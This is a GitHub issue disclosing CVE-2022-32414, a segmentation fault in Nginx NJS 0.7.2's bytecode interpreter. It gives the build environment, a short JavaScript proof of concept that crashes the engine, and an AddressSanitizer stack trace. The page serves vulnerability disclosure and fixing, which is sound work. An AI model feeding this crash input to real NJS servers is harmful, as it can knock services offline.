Headline
CVE-2022-32414: SEGV njs_vmcode.c:802:27 in njs_vmcode_interpreter · Issue #483 · nginx/njs
Nginx NJS v0.7.2 was discovered to contain a segmentation violation in the function njs_vmcode_interpreter at src/njs_vmcode.c.
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Closed
Q1IQ opened this issue
Mar 2, 2022
· 0 comments
Assignees
Comments
Environment
OS      : Linux ubuntu 5.13.0-27-generic #29~20.04.1-Ubuntu SMP Fri Jan 14 00:32:30 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
Commit  : f65981b0b8fcf02d69a40bc934803c25c9f607ab
Version : 0.7.2
Build   : 
          NJS_CFLAGS="$NJS_CFLAGS -fsanitize=address"
          NJS_CFLAGS="$NJS_CFLAGS -fno-omit-frame-pointer"
Proof of concept
function main() {
const a4 = Promise["race"](Float64Array);
function a14(a15,a16) {
    const a17 = async (a18,a19) => {
        const a20 = await a15;
        for (const a22 in "test") {
        }
    };
    const a23 = a17();
}
const a24 = a14(a4);
}
main();
Stack dump
AddressSanitizer:DEADLYSIGNAL
=================================================================
==732128==ERROR: AddressSanitizer: SEGV on unknown address (pc 0x0000004e3e53 bp 0x7ffe6e1f76b0 sp 0x7ffe6e1f6e80 T0)
==732128==The signal is caused by a READ memory access.
==732128==Hint: this fault was caused by a dereference of a high value address (see register values below).  Dissassemble the provided pc to learn which register was used.
    #0 0x4e3e53 in njs_vmcode_interpreter /home/q1iq/Documents/origin/njs_f65981b/src/njs_vmcode.c:802:27
    #1 0x6050bc in njs_await_fulfilled /home/q1iq/Documents/origin/njs_f65981b/src/njs_async.c:96:11
    #2 0x53c9ec in njs_function_native_call /home/q1iq/Documents/origin/njs_f65981b/src/njs_function.c:739:11
    #3 0x53b029 in njs_function_frame_invoke /home/q1iq/Documents/origin/njs_f65981b/src/njs_function.c:777:16
    #4 0x53b029 in njs_function_call2 /home/q1iq/Documents/origin/njs_f65981b/src/njs_function.c:600:11
    #5 0x5f45b7 in njs_function_call /home/q1iq/Documents/origin/njs_f65981b/src/njs_function.h:180:12
    #6 0x5f45b7 in njs_promise_reaction_job /home/q1iq/Documents/origin/njs_f65981b/src/njs_promise.c:1171:15
    #7 0x53c9ec in njs_function_native_call /home/q1iq/Documents/origin/njs_f65981b/src/njs_function.c:739:11
    #8 0x4deb20 in njs_vm_invoke /home/q1iq/Documents/origin/njs_f65981b/src/njs_vm.c:440:12
    #9 0x4deb20 in njs_vm_call /home/q1iq/Documents/origin/njs_f65981b/src/njs_vm.c:424:12
    #10 0x4deb20 in njs_vm_handle_events /home/q1iq/Documents/origin/njs_f65981b/src/njs_vm.c:584:19
    #11 0x4deb20 in njs_vm_run /home/q1iq/Documents/origin/njs_f65981b/src/njs_vm.c:544:12
    #12 0x4c82d7 in njs_process_script /home/q1iq/Documents/origin/njs_f65981b/src/njs_shell.c:924:15
    #13 0x4c73a1 in njs_process_file /home/q1iq/Documents/origin/njs_f65981b/src/njs_shell.c:619:11
    #14 0x4c73a1 in main /home/q1iq/Documents/origin/njs_f65981b/src/njs_shell.c:303:15
    #15 0x7f3e31cf00b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
    #16 0x41dabd in _start (/home/q1iq/Documents/origin/njs_f65981b/build/njs+0x41dabd)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/q1iq/Documents/origin/njs_f65981b/src/njs_vmcode.c:802:27 in njs_vmcode_interpreter
==732128==ABORTING
Credit
Q1IQ(@Q1IQ)
2 participants